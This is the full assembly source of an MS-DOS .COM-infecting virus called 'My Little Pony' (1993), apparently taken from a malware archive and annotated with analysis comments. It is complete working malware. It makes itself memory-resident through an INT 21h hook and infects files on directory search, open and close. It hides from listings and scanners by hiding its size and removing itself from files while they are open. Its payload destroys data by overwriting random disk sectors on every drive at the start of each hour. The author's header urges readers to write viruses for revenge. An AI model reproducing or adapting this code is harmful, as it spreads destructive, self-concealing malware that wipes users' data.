MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.mlp-1307.asm

.model tiny                     ; one 64 KiB segment (CS=DS=SS), as a .COM image requires
.code
org 100h                        ; .COM load offset; 0000h-00FFh below it is the PSP
start:
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
; A NEW ORDER OF INTELLIGENCE PRESENTS: ;
; My Little Pony 1.00 ;
; Copyright (c) 1992, 1993 by Cruel Entity / Macaroni Ted ;
; - A.N.O.I - ;
; ;
; ;
; I know that there is a much better documented source-code for this ;
; virus. And I'm also very interessted to get in touch with the guy ;
; who did that documentation. Please contact me. ;
; ;
; You may freely use this code as you want, just give me some of the ;
; credits. Please learn to create virus, so we, together can get our ;
; revenge to the soceity. Learn to feel the feeling being cruel! ;
; ;
; Of cource I can't take any responsibility for all virus-coders ;
; who use any of the routines in this virus. ;
; ;
; ;
; Greetings to; The Unforgiven for giving me AT&T's ;
; Immortal Riot's members '94 ;
; The man sitting in basement ;
; ;
; ps! Tasm /m3 and tlink /t to get this babe into executable!
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
;-----------------------------------------------------------------------
; Entry point of an infected host (and of this dropper): the installer.
; Analysis notes (defensive):
;  - asks a resident copy whether it is present (AX=0DD22h -> AX=3D33h);
;  - if not, cuts memlen paragraphs off the top of the host's own memory
;    allocation (MCB size field and PSP top-of-memory field), copies the
;    image there at offset 100h and points INT 21h at new_int_21h;
;  - finally restores the host's original first 3 bytes at CS:100h and
;    jumps to them.
; Register roles: bp = run-time address of sub_this; every data reference
; before `cancel` is bp-relative because the image sits at a different
; offset in each infected host (delta addressing).
;-----------------------------------------------------------------------
start:
call $+3                        ; pushes the address of sub_this ...
sub_this: pop bp                ; ... which becomes the delta base in bp
mov ax,0dd22h                   ; "are we already resident?" - answered by mem_check
int 21h
cmp ax,03d33h                   ; a resident copy replies with AX=3D33h
jne $+7                         ; not resident: skip the two instructions below and install
lea dx,[bp+(cancel-sub_this)]
jmp far ptr dx                  ; resident: skip installation (indirect jump via dx)
mov ax,3521h                    ; AH=35h: ES:BX = current INT 21h vector
int 21h
mov [bp+(int_21h_off-sub_this)],bx   ; patch the far-jump target used by real_int_21h
mov [bp+(int_21h_seg-sub_this)],es
mov ax,cs                       ; CS-1 = the MCB describing this program's block
dec ax
mov es,ax
mov ax,es:[0003h]               ; MCB+03h: block size in paragraphs
sub ax,[bp+(memlen-sub_this)]   ; shrink the block; no MCB is written for the cut-off part
mov es:[0003h],ax
mov ax,[bp+(memlen-sub_this)]
sub word ptr es:[0012h],ax      ; ES=PSP-1, so ES:[12h] is PSP:[02h] (top-of-memory segment): lower it too
mov es,es:[0012h]               ; ES = segment of the cut-off area
push es
lea si,[bp+(start-sub_this)]    ; copy the whole image (filelen bytes) ...
mov di,0100h                    ; ... to offset 100h there, so the org 100h offsets stay valid
mov cx,[bp+(filelen-sub_this)]
rep movsb
pop ds                          ; DS = resident segment
mov ax,2521h                    ; AH=25h: INT 21h vector := DS:new_int_21h
lea dx,new_int_21h
int 21h
cancel:                         ; common exit: hand control to the host code
push cs                         ; DS = ES = CS
push cs
pop ds
pop es
lea si,[bp+(first_bytes-sub_this)]   ; host's original 3 bytes (saved by infect)
mov cx,3
mov di,100h
rep movsb                       ; put them back at CS:100h ...
sub di,3
jmp far ptr di                  ; ... and jump there (indirect jump via di, DI=100h)
db 'Simple Simon met a pieman going to the fair said'      ; inert text carried in the image
db ' Simple Simon to the pieman let me take your ware'
;-----------------------------------------------------------------------
; Destructive payload, reached from new_int_21h when AH=2Ch reported
; minute 0. Fires only when second = 0 and hundredths <= 5 as well, i.e.
; during the first few hundredths of every hour, and then overwrites one
; pseudo-randomly chosen logical sector on each drive number from 2 (C:)
; to 24 with the memory starting at `logo`.
; Risk: silent data destruction on fixed disks; the hour-boundary trigger
; makes the damage look like random corruption.
; In:  DH = seconds, DL = hundredths (from the AH=2Ch call in new_int_21h)
;-----------------------------------------------------------------------
write_rnd_sector:
cmp dh,0                        ; seconds
jne back
cmp dl,5                        ; hundredths
ja back
pushf                           ; DIV and INT 26h below change the flags
push bx
call get_rnd                    ; AX = pseudo-random value (AH is not cleared by get_rnd)
mov cx,10
xor dx,dx
div cx                          ; AX = AX / 10 -> starting sector number
mov dx,ax                       ; DX = starting logical sector
mov al,2h                       ; AL = drive number, starting at 2 = C:
mov cx,1h                       ; CX = number of sectors to write
lea bx,logo                     ; DS:BX = data to write; DS is whatever the interrupted caller had
loopie:
int 26h                         ; absolute disk write (bypasses the file system)
popf                            ; INT 26h leaves the flags word on the stack
inc al                          ; next drive
cmp al,25                       ; drives 2..24 (C: .. Y:)
jne loopie
pop bx
popf
jmp back
db '(c)1993 Cruel Entity'      ; inert marker string
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
; New int 21h
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
;-----------------------------------------------------------------------
; Resident INT 21h handler. Entered with the CPU's IRET frame on the
; stack; the extra PUSHF here is paired with the POPF at return_21h (or
; in the routines that leave through real_int_21h / RETF 2).
; Dispatch:
;   AX=0DD22h   -> mem_check      resident check, answers AX=3D33h
;   AH=11h/12h  -> find_old       FCB find: size stealth, queue names to infect
;   AH=4Eh/4Fh  -> find_          handle find: size stealth
;   AH=3Dh      -> open_          open: remove the virus from a .COM file
;   AH=3Eh      -> close_         close: put it back
;   AH=2Ch      -> back2          get time: passed through (avoids recursion below)
;   other       -> read the time (AH=2Ch) and run write_rnd_sector on the hour
;   AH=36h      -> get_free_space infect the queued names, then pass through
; Detection notes: the INT 21h vector points into memory above the
; program's MCB; the handler answers AX=3D33h to AX=0DD22h; infected
; files carry a seconds/2 field of 10 (20 s) in their time stamp.
;-----------------------------------------------------------------------
new_int_21h:
pushf
cmp ax,0dd22h                   ; "are you there?" call
je mem_check
cmp ah,11h                      ; FCB find first
je find_old
cmp ah,12h                      ; FCB find next
je find_old
cmp ah,4eh                      ; find first (handle)
je find_
cmp ah,4fh                      ; find next (handle)
je find_
cmp ah,3dh                      ; open
je open_
cmp ah,3eh                      ; close
je close_
cmp ah,2ch                      ; get time: do not re-enter the probe below
je back2
push ax
push cx
push dx
mov ah,2ch                      ; AH=2Ch: CH=hour CL=minute DH=second DL=hundredths
int 21h                         ; goes through the vector, i.e. through this handler again
cmp cl,00                       ; minute 0: a new hour
je write_rnd_sector             ; payload; it comes back to `back`
back:
pop dx
pop cx
pop ax
back2:
cmp ah,36h                      ; get free disk space (the call DIR makes after a listing, presumably the reason it is the trigger)
jne return_21h
push bp
lea bp,get_free_space
jmp far ptr bp                  ; indirect jump via bp; get_free_space pops bp first
return_21h:
popf
real_int_21h: db 0eah           ; JMP FAR opcode, followed by the target patched in at install time
int_21h_off dw ?                ; offset of the original INT 21h handler
int_21h_seg dw ?                ; segment of the original INT 21h handler
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
; Trampolines: each saves BP, loads the target into BP and jumps through
; it; the target routine starts with `pop bp` to undo that.
find_:
push bp
lea bp,find_new
jmp far ptr bp                  ; indirect jump via bp
open_:
push bp
lea bp,open
jmp far ptr bp
close_:
push bp
lea bp,close_file
jmp far ptr bp
mem_check:                      ; reply to the resident check with AX=3D33h
popf
mov ax,3d33h
iret
call_int21h:                    ; callers do PUSHF / PUSH CS / CALL here: the original
jmp dword ptr cs:int_21h_off    ; handler's IRET then returns straight to them
ret                             ; unreachable after the jump
;-----------------------------------------------------------------------
; FCB find first/next (AH=11h/12h). Lets DOS do the search, then looks at
; the extended-FCB result in the DTA (7-byte prefix, drive, directory
; entry):  +8 name  +16 extension  +30 time  +36/+38 size low/high word
;  - .COM < 64 KiB, not yet infected: queue the name (store_in_mem)
;  - already infected (seconds/2 field == 10): subtract filelen from the
;    size shown to the caller (directory-listing stealth)
; Returns with RETF 2, keeping the flags DOS produced.
;-----------------------------------------------------------------------
find_old:
popf                            ; drop the handler's extra flags copy
pushf                           ; emulate INT: original handler IRETs back here
push cs
call call_int21h
cmp al,0ffh                     ; AL=FFh: no (more) matching file
je no_more_files
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
mov ah,2fh                      ; AH=2Fh: ES:BX = current DTA
int 21h
push es                         ; DS:SI = DTA
pop ds
mov si,bx
add si,16                       ; extension field
lodsw
cmp ax,'OC'                     ; "CO" ('C' in AL, 'O' in AH)
jne cancel_ff
lodsb
cmp al,'M'                      ; "M"
jne cancel_ff
ext_ok:
;ext=com
mov si,bx
add si,26h                      ; high word of the file size
lodsw
cmp ax,0                        ; only files < 64 KiB
jne cancel_ff
mov si,bx
add si,30                       ; time field; low 5 bits = seconds/2
lodsw
and al,00011111b
cmp al,00001010b                ; 10 -> 20 s: the infection marker
je $+7                          ; already infected: fall through to the size stealth
lea dx,store_in_mem             ; not infected: remember the name for later infection
jmp far ptr dx                  ; indirect jump via dx
mov si,bx
add si,36                       ; low word of the file size
mov di,si
lodsw
sub ax,cs:filelen               ; DS is the DTA segment, hence the CS override
jz cancel_ff                    ; a size that would become 0 is left as is
stosw
cancel_ff:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
no_more_files: retf 2           ; return to the caller, discarding the interrupt's flags word
db "%%% MY LITTLE PONY %%% COPYRIGHT(C) 1993 A.N.O.I. %%%"   ; identifying string (usable as a scan signature)
;-----------------------------------------------------------------------
; Queue the 8-byte name from the FCB result (DS:BX) in file_buffer, a
; table of 10 space-padded 8-byte slots; a slot whose first byte is a
; space is free. If the table is full the name is dropped.
; Always exits through cancel_ff.
;-----------------------------------------------------------------------
store_in_mem:
mov si,bx
add si,8                        ; name field of the extended-FCB result
push cs                         ; ES = CS: the table lives in the virus segment
pop es
mov cx,10                       ; 10 slots
lea di,file_buffer
check_pos:
cmp byte ptr es:[di],20h        ; free slot?
je store
add di,8
loop check_pos
jmp cancel_ff                   ; table full
store:
mov cx,8
rep movsb                       ; copy the 8 name bytes DS:SI -> ES:DI
jmp cancel_ff
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
;-----------------------------------------------------------------------
; AH=36h hook (get free disk space). Calls infect for every name queued
; in file_buffer, blanks the table, then lets DOS handle the request.
; Entered via the trampoline in new_int_21h, so BP is restored first; the
; POPF at the end pairs with the PUSHF at new_int_21h.
;-----------------------------------------------------------------------
get_free_space:
pop bp
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
push cs                         ; DS = ES = CS
push cs
pop ds
pop es
lea di,file_buffer
mov cx,10                       ; at most 10 slots
check_last:
cmp byte ptr [di],20h           ; a space in the first byte ends the queue
je cancel_inf
push di
push cx
mov si,di                       ; DS:SI = 8-byte space-padded name
call infect
pop cx
pop di
add di,8
loop check_last
cancel_inf:
push cs                         ; blank file_buffer (80 bytes) and filename (12 bytes)
pop es
lea di,file_buffer
mov cx,80+12
mov al,20h
rep stosb
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
jmp real_int_21h                ; continue with the original AH=36h handler
;-----------------------------------------------------------------------
; Append the virus image to one .COM file.
; In:   DS:SI = 8-byte space-padded base name (no extension); ES = CS
; Uses: filename, first_bytes, jmp_1/jmp_2, filelen (all in CS)
; Steps: build "NAME.COM",0; read and clear the attributes; open through
; the original handler (so the open hook does not see it); skip files
; whose time stamp already carries the marker; keep the first 3 bytes in
; first_bytes, append the image, write a JMP to it at offset 0; set
; seconds/2 := 10 as the marker; close through the original handler;
; restore the attributes.
; Out:  DS = CS. Only the attribute read is error-checked.
;-----------------------------------------------------------------------
infect:
;convert filename to asciiz
lea di,filename                 ; ES:DI = filename
mov cx,8                        ; base name only
cpy_filename:
lodsb
cmp al,20h                      ; stop at the first padding space
je filename_klar
stosb
loop cpy_filename
filename_klar:                  ; append ".COM" and the terminator
mov al,'.'
stosb
mov al,'C'
stosb
mov al,'O'
stosb
mov al,'M'
stosb
mov al,0
stosb
push cs
pop ds
mov ax,4300h                    ; AX=4300h: CX = file attributes
lea dx,filename
int 21h
jnc $+3                         ; skip the RET unless CF is set
ret                             ; CF set (e.g. no such file): give up
push cx                         ; keep the attributes
xor cx,cx
mov ax,4301h                    ; AX=4301h, CX=0: clear all attributes (read-only would block the write)
int 21h
mov ax,3d02h                    ; open read/write ...
lea dx,filename
pushf                           ; ... via the original handler, bypassing the open hook
push cs
call call_int21h
mov bx,ax                       ; BX = handle (CF is not checked)
mov ax,5700h                    ; AX=5700h: CX = time, DX = date
int 21h
push dx                         ; kept for the restore at cancel_inf2
push cx
and cl,00011111b                ; seconds/2 field
cmp cl,00001010b                ; == 10: already infected
jne $+7                         ; not infected: skip the jump below
lea dx,cancel_inf2
jmp far ptr dx                  ; indirect jump via dx
mov ah,3fh                      ; read the host's first 3 bytes into first_bytes
mov cx,3                        ; (they travel inside the appended image; `start` restores them)
lea dx,first_bytes
int 21h
mov ax,4202h                    ; seek to end: AX = file length (< 64 KiB)
xor dx,dx
xor cx,cx
int 21h
sub ax,3                        ; displacement of a 3-byte JMP at offset 0 to the appended image
mov jmp_2,ax
mov ah,40h                      ; append filelen bytes of the image from DS:100h
mov dx,100h
mov cx,filelen
int 21h
mov ax,4200h                    ; seek to start
xor dx,dx
xor cx,cx
int 21h
mov ah,40h                      ; overwrite the first 3 bytes with E9 xxxx (jmp_1/jmp_2)
mov cx,3
lea dx,jmp_1
int 21h
cancel_inf2:
pop cx                          ; original time/date
pop dx
and cl,11100000b                ; seconds/2 := 10 (20 s), the infection marker;
or cl,00001010b                 ; the rest of the time stamp is kept
mov ax,5701h                    ; AX=5701h: set time/date
int 21h
mov ah,3eh                      ; close via the original handler, bypassing the close hook
pushf
push cs
call call_int21h
mov ax,4301h                    ; restore the saved attributes
lea dx,filename
pop cx
int 21h
ret
;-----------------------------------------------------------------------
; Handle-based find first/next (AH=4Eh/4Fh). Lets DOS search, then
; inspects the find data block in the DTA:
;   +16h time   +1Ah/+1Ch size low/high word   +1Eh ASCIIZ name
; For an already infected .COM (< 64 KiB, seconds/2 == 10) it subtracts
; filelen from the reported size. Unlike find_old it queues no names.
; Entered via the find_ trampoline (pops BP). Returns with RETF 2,
; keeping DOS's flags.
;-----------------------------------------------------------------------
find_new:
pop bp
popf                            ; drop the handler's extra flags copy
pushf                           ; emulate INT to the original handler
push cs
call call_int21h
jnc more_files
retf 2                          ; error / no more files: CF goes to the caller
more_files:
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
mov ah,2fh                      ; AH=2Fh: ES:BX = DTA
int 21h
push es                         ; DS:SI = DTA
pop ds
mov si,bx
push cs                         ; ES:DI = filename (in CS)
pop es
add si,1eh                      ; ASCIIZ name in the find block
lea di,filename
mov cx,25                       ; copy up to 25 bytes, stopping at the NUL
get_fname:
lodsb
cmp al,0
je get_f_klar
stosb
loop get_fname
get_f_klar:
mov al,0                        ; terminate
stosb
push ds                         ; ES = DTA segment
pop es
push cs                         ; DS = CS
pop ds
mov si,di
sub si,4                        ; back to the 3 characters before the NUL
lodsw                           ; "CO" / "co"
cmp ax,'OC'
je check_m
cmp ax,'oc'
jne cancel_new
check_m:
lodsb                           ; "M" / "m"
cmp al,'m'
je ext_is_com
cmp al,'M'
jne cancel_new
ext_is_com:
push es                         ; DS = DTA segment again
pop ds
mov si,bx
add si,1ch                      ; high word of the size
lodsw
cmp ax,0                        ; only files < 64 KiB
jne cancel_new
mov si,bx
add si,16h                      ; time field
lodsw
and al,00011111b                ; seconds/2
cmp al,00001010b
jne cancel_new                  ; not infected: nothing to hide
mov si,bx
add si,1ah                      ; low word of the size
mov di,si
lodsw
sub ax,cs:filelen               ; hide the appended length
jz cancel_new
stosw
cancel_new:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
no_more_files2: retf 2          ; back to the caller, discarding the interrupt's flags word
;-----------------------------------------------------------------------
; AH=3Dh hook (open). If the path ends in .COM and the file carries the
; marker, the virus is removed before the caller's open goes through:
; the host's original 3 bytes (kept as the last 3 bytes of the image)
; are written back to offset 0 and the file is truncated to its original
; length. The time stamp is not touched, so the marker stays. The close
; hook re-infects the file later.
; Effect: a scanner or checksum tool that opens the file sees a clean
; copy (stealth); the seconds/2 == 10 stamp on a clean file is a trace.
; Entered via the open_ trampoline (pops BP). In: DS:DX = ASCIIZ path.
;-----------------------------------------------------------------------
open:
pop bp
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov al,'.'
push ds                         ; ES:DI = caller's path
pop es
mov di,dx
mov cx,50                       ; scan at most 50 bytes for '.'
repnz scasb
mov si,di                       ; DS:SI = extension after the '.'
lodsw
cmp ax,'OC'                     ; "CO" / "co"
je check_m2
cmp ax,'oc'
je $+7                          ; "co": skip the jump below
lea dx,cancel_open
jmp far ptr dx                  ; not .COM: leave it alone (indirect jump via dx)
check_m2:
lodsb
cmp al,'m'
je ext_is_com2
cmp al,'M'
jne cancel_open
ext_is_com2:
mov ax,3d02h                    ; open read/write through the original handler
pushf
push cs
call call_int21h
jc cancel_open
mov bx,ax                       ; BX = handle
push cs                         ; DS = ES = CS
pop ds
push cs
pop es
mov ax,5700h                    ; AX=5700h: CX = time
int 21h
and cl,00011111b                ; seconds/2 == 10: infected
cmp cl,00001010b
jne cancel_open
mov ax,4202h                    ; seek to end: AX = length
xor dx,dx
xor cx,cx
int 21h
push ax                         ; keep the length
sub ax,3
mov dx,ax                       ; seek to length-3: the saved original first bytes
mov ax,4200h
mov cx,0
int 21h
mov ah,3fh                      ; read them into temp_bytes
mov cx,3
lea dx,temp_bytes
int 21h
mov ax,4200h                    ; seek to start
xor cx,cx
xor dx,dx
int 21h
mov ah,40h                      ; write the original bytes back at offset 0
mov cx,3
lea dx,temp_bytes
int 21h
pop dx
sub dx,filelen                  ; original length
mov ax,4200h                    ; seek there ...
mov cx,0
int 21h
mov ah,40h                      ; ... and write 0 bytes: truncates the file
mov cx,0
int 21h
mov ah,3eh                      ; close through the original handler
pushf
push cs
call call_int21h
cancel_open:                    ; shared exit, also used by close_file
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
pushf                           ; now perform the caller's own request
push cs
call call_int21h
retf 2                          ; return with the flags DOS produced
;-----------------------------------------------------------------------
; AH=3Eh hook (close). Resolves handle BX to its SFT entry through
; INT 2Fh (AX=1220h: JFT entry for BX; AX=1216h: SFT entry for the index
; in BL) and, if the SFT extension is "COM", runs infect on the name.
; SFT offsets used: +20h name (8 bytes, space padded), +28h extension.
; Exits through cancel_open, which passes the close on to DOS.
; Entered via the close_ trampoline (pops BP).
;-----------------------------------------------------------------------
close_file:
pop bp
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov ax,1220h                    ; INT 2Fh AX=1220h: ES:DI -> JFT entry of handle BX
int 02Fh
mov bl,es:[di]                  ; BL = SFT index
mov ax,1216h                    ; INT 2Fh AX=1216h: ES:DI -> SFT entry
int 02Fh
mov bp,di                       ; BP = SFT entry
add di,28h                      ; extension field
push es                         ; DS:SI = extension
pop ds
mov si,di
lodsw
cmp ax,'OC'                     ; "CO" (upper case only here)
jne cancel_open
lodsb
cmp al,'M'
jne cancel_open
mov si,bp
add si,20h                      ; DS:SI = 8-byte name
push cs                         ; ES = CS, as infect expects
pop es
call infect                     ; re-infect the file as it is closed
jmp cancel_open
;-----------------------------------------------------------------------
; Pseudo-random byte derived from the PIT counter.
; In:  AH = whatever the caller had (it takes part in the shifts)
; Out: AL = the seven top bits of AX on entry (collected in DL);
;      AH = the shifted high byte, not cleared.
; BX, CX, DX are preserved; flags are changed.
;-----------------------------------------------------------------------
get_rnd:
push dx
push cx
push bx
in al,40h                       ; PIT channel 0 counter, low byte (port 40h)
add ax,0000                     ; no effect apart from the flags
mov dx,0000                     ; DX collects the bits shifted out of AX
mov cx,0007                     ; 7 rounds
rnd_init5:
shl ax,1                        ; DX:AX <<= 1
rcl dx,1
mov bl,al
xor bl,dh                       ; sign of AL xor DH decides ...
jns rnd_init6
inc al                          ; ... whether the low byte is bumped
rnd_init6:
loop rnd_init5
pop bx
mov al,dl                       ; result
pop cx
pop dx
rnd_init_ret:                   ; unused label
ret
;-----------------------------------------------------------------------
; Data area. Everything up to `eof` belongs to the image appended to
; infected files, so these values travel with every copy.
;-----------------------------------------------------------------------
logo db '>>> A.N.O.I <<<'      ; payload pattern; INT 26h writes a whole sector, so the bytes after it go too
temp_bytes db 3 dup(?)          ; scratch for the 3 bytes the open hook writes back
filelen dw offset eof - offset start   ; image length = number of bytes appended to a host
memlen dw 100                   ; paragraphs (1600 bytes) taken from the host's allocation at install
file_buffer db 80 dup(20h)      ; 10 x 8-byte space-padded names queued for infection
filename db 12 dup(?)           ; ASCIIZ work buffer used by infect and find_new
jmp_1 db 0e9h                   ; JMP NEAR opcode ...
jmp_2 dw ?                      ; ... and its displacement: the 3 bytes written at offset 0 of a host
first_bytes db 90h,0cdh,20h     ; host's original first 3 bytes; in this sample NOP / INT 20h (terminate)
eof:
end start